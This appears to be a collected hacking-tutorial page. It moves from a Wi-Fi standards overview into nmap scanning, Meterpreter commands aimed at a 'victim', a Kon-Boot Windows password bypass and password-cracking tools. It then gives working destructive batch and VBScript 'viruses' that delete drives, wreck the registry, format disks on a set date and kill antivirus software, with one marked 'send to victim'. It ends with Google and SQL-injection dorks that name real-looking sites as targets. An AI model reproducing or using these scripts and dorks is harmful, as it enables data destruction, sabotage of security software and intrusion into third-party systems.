Introduction of wifi

Wi-Fi is the industry name for wireless local area network (WLAN)communication technology related to the IEEE 802.11 family of wireless networking standards.
Wi-Fi technology first became popular with 802.11b, introduced in 1999 and the first standard in that family to enjoy mainstream adoption. Today, Wi-Fi refers to any of the established standards:

802.11a
802.11b
802.11g
802.11n
802.11ac

The Wi-Fi Alliance certifies vendor equipment to ensure 802.11 products on the market follow the various 802.11 specifications.
Consumer versions of Wi-Fi products have additionally maintained backward compatibility.
For example, 802.11b, 802.11g, and 802.11n equipment all can communicate with each other, and mixed Wi-Fi networks with devices running multiple of these standards are commonly referred to as "802.11b/g/n" networks.
802.11ac equipment also communicates with each of these others.
The old 802.11a technology is not compatible with these others and has fallen out of mainstream usage as a result.

Radio Types of wifi

           

802.11

 In 1997, the Institute of Electrical and Electronics Engineers (IEEE) created the first WLAN standard.
They called it 802.11 after the name of the group formed to oversee its development.
Unfortunately, 802.11 only supported a maximum network bandwidth of 2 Mbps - too slow for most applications.
For this reason, ordinary 802.11 wireless products are no longer manufactured.

802.11b

IEEE expanded on the original 802.11 standard in July 1999, creating the 802.11bspecification.
802.11b supports bandwidth up to 11 Mbps, comparable to traditionalEthernet .
802.11b uses the same unregulated radio signaling frequency (2.4 GHz) as the original 802.11 standard. Vendors often prefer using these frequencies to lower their production costs.
Being unregulated, 802.11b gear can incur interference from microwave ovens, cordless phones, and other appliances using the same 2.4 GHz range.

However, by installing 802.11b gear a reasonable distance from other appliances, interference can easily be avoided.

Pros of 802.11b - lowest cost; signal range is good and not easily obstructed
 

Cons of 802.11b - slowest maximum speed; home appliances may interfere on the unregulated frequency band

 

802.11a

While 802.11b was in development, IEEE created a second extension to the original 802.11 standard called 802.11a . Because 802.11b gained in popularity much faster than did 802.11a, some folks believe that 802.11a was created after 802.11b.
 In fact, 802.11a was created at the same time. Due to its higher cost, 802.11a is usually found on business networks whereas 802.11b better serves the home market.
802.11a supports bandwidth up to 54 Mbps and signals in a regulated frequency spectrum around 5 GHz.
This higher frequency compared to 802.11b shortens the range of 802.11a networks.
The higher frequency also means 802.11a signals have more difficulty penetrating walls and other obstructions.
Because 802.11a and 802.11b utilize different frequencies, the two technologies are incompatible with each other. Some vendors offer hybrid 802.11a/b network gear, but these products merely implement the two standards side by side (each connected devices must use one or the other).

Pros of 802.11a - fast maximum speed; regulated frequencies prevent signal interference from other devices
Cons of 802.11a - highest cost; shorter range signal that is more easily obstructed

           

802.11g:

In 2002 and 2003, WLAN products supporting a newer standard called 802.11g emerged on the market.

802.11g attempts to combine the best of both 802.11a and 802.11b.
802.11g supports bandwidth up to 54 Mbps, and it uses the 2.4 Ghz frequency for greater range. 802.11g is backwards compatible with 802.11b, meaning that 802.11g access points will work with 802.11b wireless network adapters and vice versa.

Pros of 802.11g - fast maximum speed; signal range is good and not easily obstructed
Cons of 802.11g - costs more than 802.11b; appliances may interfere on the unregulated signal frequency

 

 802.11n: 

802.11n (also sometimes known as "Wireless N") was designed to improve on 802.11g in the amount of bandwidth supported by utilizing multiple wireless signals and antennas (called MIMO technology) instead of one.

Industry standards groups ratified 802.11n in 2009 with specifications providing for up to 300 Mbps of network bandwidth. 802.11n also offers somewhat better range over earlier Wi-Fi standards due to its increased signal intensity, and it is backward-compatible with 802.11b/g gear.

Pros of 802.11n - fastest maximum speed and best signal range; more resistant to signal interference from outside sources
Cons of 802.11n - standard is not yet finalized; costs more than 802.11g; the use of multiple signals may greatly interfere with nearby 802.11b/g based networks.

802.11ac

The newest generation of Wi-Fi signaling in popular use, 802.11ac utilizes dual band wireless technology, supporting simultaneous connections on both the 2.4 GHz and 5 GHz Wi-Fi bands.
802.11ac offers backward compatibility to 802.11b/g/n and bandwidth rated up to 1300 Mbps on the 5 GHz band plus up to 450 Mbps on 2.4 GHz.

802.11ac

The newest generation of Wi-Fi signaling in popular use, 802.11ac utilizes dual band wireless technology, supporting simultaneous connections on both the 2.4 GHz and 5 GHz Wi-Fi bands. 802.11ac offers backward compatibility to 802.11b/g/n and bandwidth rated up to 1300 Mbps on the 5 GHz band plus up to 450 Mbps on 2.4 GHz.

Other IEEE 802.11 working group standards like 802.11h and 802.11j are extensions or offshoots of Wi-Fi technology that each serve a very specific purpose.

WiMax also was developed separately from Wi-Fi. WiMax is designed for long-range networking (spanning miles or kilometers) as opposed to local area wireless networking.

Information Gathering

Information gathering means collecting as much information as available regarding target networking. Nmap is best tool for collecting information . User can also execute their own script via “Nmap script engine”. Nmap script engine is one of the most powerful feature of nmap.list of nmap command are as below:

1.Nmap  192.168.0.1         (Show the open port of 192.168.0.1)
2.Nmap  192.168.0.1/24   (Show the open port from 192.168.0.1 to 192.168.0.24)
3.Nmap  192.168.0.*         (show the all open port)
4.Nmap –O 192.168.0.1     (check the opeating system of specified internal IP)
5.Nmap  -sP 192.168.0.1/24  (ping the ranged IP address) 
6.Nmap  -T5 192.168.0.1/24  (Quick scan)
7.Nmap  --top-ports 20 192.168.0.1/24  (scan the top 20 ports of ranged network)
8.Nmap  -sT –p80 192.168.0.*   (scan the tcp onnection of port 80)  (-sT=tcp scan,p80 =port 80 )
9.Nmap  -v 192.168.0.1  (for scanning top 1000 port of IP)
10.Nmap  -f  192.168.0.* --exclude 192.168.0.2  (scan the top 100 ports of ranged IP exclude 192.168.0.2

Full form of  command

1. -sT     TCP scan

2. -sS      SYN scanning

3. -sF      FIN scan

4. -sN      Null scan

5. -sX      Tree scan

6. -sP      ping scan

7. -sU      UDP scan

8.  -O       Operating system

9. -sI       Idle scanning

10. -sA     ACK scan

11. -F       fast scan

12. man  nmap -manual page of nmap

Information also collected with the help of zenmap which is graphical version of nmap provide the same feature and accessibility as available in namp.

Note: nmap is important tool with lots of feature  user don’t have to learn the namp command as most of the command starting with the first alphatebate of name. (eg –sT=TCP)

Command For Backtrack

Backtrack Command for beginners

1. ? - help menu

2. background - moves the current session to the background

3. bglist - provides a list of all running background scripts

4. channel - displays active channels

5. close - closes a channel

6. exit - terminates a meterpreter session

7. migrate - moves the active process to a designated PID

8. run - executes the meterpreter script designated after it

9. use - loads a meterpreter extension

Backtrack Command for Network management

1. Ifconfig-Provide the IP address of private network

2. Ifconfig eth0-Display the ethernet adapter

3. ifconfig eth0 down-Disable the adapter

4. ifconfig eth0  192.168.0.1-manually set up the IP address

5. ifconfig eth0 netmask 255.255.255.0-manuall set the subnet mask

6. ifconfig eth0 up-Enable the adapter

Backtrack command for file management

1. cat - read and output to stdout the contents of a file

2. cd - change directory on the victim

3. del - delete a file on the victim

4. download - download a file from the victim system to the attacker system

5. edit - edit a file with vim

6. ls - list files in current directory

7. mkdir - make a directory on the victim system

8. pwd - print working directory

9. rm - delete a file

10. rmdir - remove directory on the victim system

11. upload - upload a file from the attacker system to the victim

Command for exploiting victim computer

1. clear - clears the screen

2. Ifconfig- show the IP address of computer

3. execute - executes a command

4. getpid - gets the current process ID (PID)

5. getuid - get the user that the server is running as

6. kill - terminate the process designated by the PID

7. ps - list running processes

8. reboot - reboots the victim computer

9. reg - interact with the victim's registry

10. shell - opens a command shell on the victim machine

11. shutdown - shuts down the victim's computer

12. sysinfo - gets the details about the victim computer such as OS and name

13. keyscan_start - starts the software keylogger when associated with a process such as Word or browser

14. keyscan_stop - stops the software keylogger

15. keyscan_dump - dumps the contents of the software keylogger

16. screenshot - grabs a screenshot of the meterpreter desktop

17. set_desktop - changes the meterpreter desktop

Information Gathering

One click to copy full website

1). Download HT Track website copier and install.

2). Click on Next button.

3). Provide name in New project name field.

4). Provide directory to store web page data.

5). Click Next

6). Enter the URL of website in web address field and click next

7). Now the HT Track start copy the website.

8). Finish

One click to copy E-mail address attached to website

1.Download E-mail extractor and install

2.Choose one of the three options

        a. Extract from search engines. (i.e. www.google.com)

        b. Extract from web page.

        c. (i.e. http://emailextractorpro.com)

        Extract email from local computer.

3.Hit start button

4.Finish

How To Check Domain Name Details:

1.Go to Who.is

2.Then type in the domain name you want to search 

  eg:www.google.com

How to Bypass the Windows 8.1 Password via Kon-Boot.

How to Install Kon-Boot On USB

Step 1: Download Kon-Boot 2.4.

Step 2: Connect the Usb and format it.

Step 3: Right Click usb_install2NEEDADMIN.bat file and run it as admin.

Step 4:Now popup appear on screen select open

Step 5:Now select ok

Step 6:Now select Run

Step 7:Done

Note:At the time of setting up kon boot remove all the unused  pendrive.

Now just restart your pc with the kon-boot usb pluged in and press f12 to boot from usb after that a kon-boot screen will appear just press enter and now it will show windows login screen with password prompt simply just press enter and that's it you have succesfully bypass it.

Support  till windows 8.1

Introduction to Password Cracking

Password Cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach (brute-force attack) is to repeatedly try guesses for the password.
The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves System Administration privileges), to gain unauthorized access to a system, or as a preventive measure by System Administrators to check for easily crackable passwords. On a file-by-file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.

computer programmers have been trying to create algorithms for password cracking in less time. Most of the password cracking tools try to login with every possible combination of words. If login is successful, it means the password was found. If the password is strong enough with a combination of numbers, characters and special characters, this cracking method may take hours to weeks or months. A few password cracking tools use a dictionary that contains passwords. These tools are totally dependent on the dictionary, so success rate is lower.

Tips to create the strong password

The longer the password, the harder it is to crack: Password length is the most important factor. If you select a small password, password cracking tools can easily crack it by using few words combinations. A longer password will take a longer time in guessing. Your password must be at least 8 characters long.

Always use a combination of characters, numbers and special characters: This is another thing which makes passwords hard to crack. Password cracking tools try the combination of one by one. Have a combination of small characters, capital letters, and special characters. Suppose if you have only numbers in your password. Password cracking tools only need to guess numbers from 0-9. Here only length matters. But having a password combination of a-z, A-Z, 0-9 and other special characters with a good length will make it harder to crack. This kindof password sometimes takes weeks to crack.

Variety in passwords: One important thing you must always take care. Never use same password everywhere. Cyber criminals can steal passwords from one website and then try it on other websites too.
In case you are not sure about the strength of your password, you can check it from variety of online tools available for free. Try this official Microsoft Tool for checking the password strength.

•https://www.microsoft.com/security/pc-security/password-checker.aspx

•Example of strong password: AdZfL48024@ #$!

Tools of Password Cracking

1.  Brutus

Brutus is one of the most popular remote online password cracking tools. It claims to be the fastest and most flexible password cracking tool. This tool is free and is only available for Windows systems. It was released back in October 2000.
It supports HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB, Telnet and other types such as IMAP, NNTP, NetBus, etc. You can also create your own authentication types. This tool also supports multi-stage authentication engines and is able to connect 60 simultaneous targets. It also has resume and load options. So, you can pause the attack process any time and then resume whenever you want to resume.
This tool has not been updated for many years. Still, it can be useful for you.

2.   RainbowCrack

RainbowCrack is a hash cracker tool that uses a large-scale time-memory trade off process for faster password cracking than traditional brute force tools. Time-memory trade off is a computational process in which all plain text and hash pairs are calculated by using a selected hash algorithm. After computation, results are stored in the rainbow table. This process is very time consuming. But, once the table is ready, it can crack a password must faster than brute force tools.
You also do not need to generate rainbow tablets by yourselves. Developers of RainbowCrack have also generated LM rainbow tables, NTLM rainbow tables, MD5 rainbow tables and Sha1 rainbow tables. Like RainbowCrack, these tables are also available for free. You can download these tables and use for your password cracking processes.

This tool is available for both Windows and Linux systems.

3. Wfuzz

Wfuzz is another web application password cracking tool that tries to crack passwords with brute forcing. It can also be used to find hidden resources like directories, servlets and scripts. This tool can also identify different kind of injections includingSQL Injection, XSS Injection, LDAP Injection, etc in Web applications.

Key features of Wfuzz password cracking tool:

Capability of injection via multIipe points with multiple dictionary
Output in colored HTML
Post, headers and authentication data brute forcing
Proxy and SOCK Support, MultIipe Proxy Support
Multi Threading
Brute force HTTP Password
POST and GET Brute forcing
Time delay between requests
Cookies fuzzing

4.  Cain and Abel

Cain and Abel is a well-known password cracking tool that is capable of handling a variety of tasks. The most notable thing is that the tool is only available for Windows platforms. It can work as sniffer in the network, cracking encrypted passwords using the dictionary attack, recording Voip conversations, brute force attacks, cryptanalysis attacks, revealing password boxes, uncovering cached passwords, decoding scrambled passwords, and analyzing routing protocols.

Cain and Abel does not exploit any vulnerability or bugs. It only covers security weakness of protocols to grab the password. This tool was developed for network administrators, security professionals, forensics staff, and penetration testers.

5.  John the Ripper

John the Ripper is another well-known free open source password cracking tool for Linux, Unix and Mac OS X. A Windows version is also available. This tool can detect weak passwords. A pro version of the tool is also available, which offers better features and native packages for target operating systems. You can also download Openwall GNU/*/Linux that comes with John the Riper.

 

6. THC Hydra

THC Hydra is a fast network logon password cracking tool. When it is compared with other similar tools, it shows why it is faster. New modules are easy to install in the tool. You can easily add modules and enhance the features. It is available for Windows, Linux, Free BSD, Solaris and OS X. This tool supports various network protocols.

Currently it supports Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

7. Medusa

Medusa is also a password cracking tool similar to THC Hydra. It claims to be a speedy parallel, modular and login brute forcing tool. It supports HTTP, FTP, CVS, AFP, IMAP, MS SQL, MYSQL, NCP, NNTP, POP3, PostgreSQL, pcAnywhere, rlogin, SMB, rsh, SMTP, SNMP, SSH, SVN, VNC, VmAuthd and Telnet. While cracking the password, host, username and password can be flexible input while performing the attack.
Medusa is a command line tool, so you need to learn commands before using the tool. Efficiency of the tool depends on network connectivity. On a local system, it can test 2000 passwords per minute.
With this tool, you can also perform a parallel attack. Suppose you want to crack passwords of a few email accounts simultaneously. You can specify the username list along with the password list.
 

8. OphCrack

OphCrack is a free rainbow-table based password cracking tool for Windows. It is the most popular Windows password cracking tool, but can also be used on Linux and Mac systems. It cracks LM and NTLM hashes. For cracking Windows XP, Vista and Windows 7, free rainbow-tables are also available.
A live CD of OphCrack is also available to simplify the cracking. One can use the Live CD of OphCrack to crack Windows-based passwords. This tool is available for free.

9. L0phtCrack

L0phtCrack is an alternative to OphCrack. It attempts to crack Windows password from hashes. For cracking passwords, it uses Windows workstations, network servers, primary domain controllers, and Active Directory. It also uses dictionary and brute force attacking for generating and guessing passwords. It was acquired by Symantec and discontinued in 2006. Later L0pht developers again re-acquired it and launched L0phtCrack in 2009.
It also comes with a schedule routine audit feature. One can set daily, weekly or monthly audits, and it will start scanning on the scheduled time.

10. Aircrack-NG

Aircrack-NG is a WiFi password cracking tool that can crack WEP or WPA passwords. It analyzes wireless encrypted packets and then tries to crack passwords via its cracking algorithm. It uses the FMS attack along with other useful attack techniques for cracking password. It is available for Linux and Windows systems. A live CD of Aircrack is also available.

Indian Cyber War Join Today.........

https://www.facebook.com/pages/It-security-ethical-hacking/397533740335344

Virus Writing

IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .

 All Scripts Here Are To Be Copied In Note Pad


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file

---

>>Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

---

>>The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* |y

Save It As Anything.bat
 

---

>> This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

It Only Works With Windows XP

---

>>Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

---

>>Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

---

>> Bomb Virus

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit

And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day

---

>>Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

---

>>Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

---

>>Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

---

What sex is your computer ?

-> open notepad
-> copy code
CreateObject("SAPI.SpVoice").Speak"I love YOU"

-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it

---

Make Your Keyboard Disco Light 

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..

How To Disable Victim Antivirus.

 Open Notepad Copy it and Paste To Notepad

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Now Save this code as .bat and send to victim :)

---

>>Tasks Kill

@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause
  save this as .bat file and send and destroy the victim & k!ll Operat!ng systeM!

---

>>Code type in notepad

@echo off
shutdown -r -f -t 00

>>Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC. ..!!..!

---

>>Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

---

>> To make your pc talk

Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear now what u typed..

this works in xp, vista, win7 also.

enjoy!!!

Google Hacking

Google queries for locating various Web servers
“Apache/1.3.28 Server at” intitle:index.of
Apache 1.3.2
“Apache/2.0 Server at” intitle:index.of
Apache 2.0
“Apache/* Server at” intitle:index.of
any version of Apache
“Microsoft-IIS/4.0 Server at” intitle:index.of
Microsoft Internet Information Services 4.0
“Microsoft-IIS/5.0 Server at” intitle:index.ofMicrosoft Internet Information Services 5.0
“Microsoft-IIS/6.0 Server at” intitle:index.of
Microsoft Internet Information Services 6.0
“Microsoft-IIS/* Server at” intitle:index.of
any version of Microsoft Internet Information Services
“Oracle HTTP Server/* Server at” intitle:index.of
any version of Oracle HTTP Server
“IBM _ HTTP _ Server/* * Server at” intitle:index.of
any version of IBM HTTP Server
“Netscape/* Server at” intitle:index.of
any version of Netscape Server
“Red Hat Secure/*” intitle:index.of
any version of the Red Hat Secure server
“HP Apache-based Web Server/*” intitle:index.of
any version of the HP server
Queries for discovering standard post-installation
intitle:”Test Page for Apache Installation” “You are free”
Apache 1.2.6
intitle:”Test Page for Apache Installation” “It worked!” “this Web site!”
Apache 1.3.0 – 1.3.9
intitle:”Test Page for Apache Installation” “Seeing this instead”
Apache 1.3.11 – 1.3.33, 2.0
intitle:”Test Page for the SSL/TLS-aware Apache Installation” “Hey, it worked!”
Apache SSL/TLS
intitle:”Test Page for the Apache Web Server on Red Hat Linux”
Apache on Red Hat
intitle:”Test Page for the Apache Http Server on Fedora Core”
Apache on Fedora
intitle:”Welcome to Your New Home Page!”
Debian Apache on Debian
intitle:”Welcome to IIS 4.0!”
IIS 4.0
intitle:”Welcome to Windows 2000 Internet Services”
IIS 5.0

intitle:”Welcome to Windows XP Server Internet Services”
IIS 6.0
Querying for application-generated system reports
“Generated by phpSystem”

operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points
“This summary was generated by wwwstat”
web server statistics, system file structure
“These statistics were produced by getstats”
web server statistics, system file structure
“This report was generated by WebLog”
web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis”
systemperformance statistics as MRTG charts, network configuration
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
server version, operating system type, child process list, current connections
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
web server activity, lots of visitor information
intitle:”Multimon UPS status page”
UPS device performance statistics
intitle:”statistics of” “advanced web statistics”
web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center”

system performance statistics as MRTG charts, hardware configuration, running services
intitle:”Usage Statistics for” “Generated by Webalizer”
web server statistics, visitor information, system file structure
intitle:”Web Server Statistics for ****”
web server statistics, visitor information
nurl:”/axs/ax-admin.pl” -script
web server statistics, visitor information
inurl:”/cricket/grapher.cgi”
MRTG charts of network interface performance
inurl:server-info “Apache Server Information”
web server version and configuration, operating system type, system file structure
“Output produced by SysWatch *”
operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs



dork for finding admin page
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
phpSQLiteAdmin/
server_admin_small/
database_administration/
system_administration/

Update Imp. Dorks.
Dork : "inurl:dettaglio.php?id="

Exploit :www.victim.com/sito/dettaglio.php?id=[SQL]

Example :http://www.cicloposse.com/dettaglio.php?id=61'
----------------------------------------------------------------------------------------------------------------
Dork: inurl:prodotto.php?id)

Exploit: 
www.victim.com/prodotto.php?id=[SQL]

Example:http://www.poderimorini.com/en/prodotto.php?id=14'

---

sql injection dorks 
allinurl: \”index php go buy\”
allinurl: \”index.php?go=sell\”
allinurl: \”index php go linkdir\”
allinurl: \”index.php?go=resource_center\”
allinurl: \”resource_center.html\”
allinurl: \”index.php?go=properties\”
allinurl: \”index.php?go=register\”

Error message queries

“A syntax error has occurred”filetype:ihtml

Informix database errors, potentially containing function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”

authorisation errors, potentially containing user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”

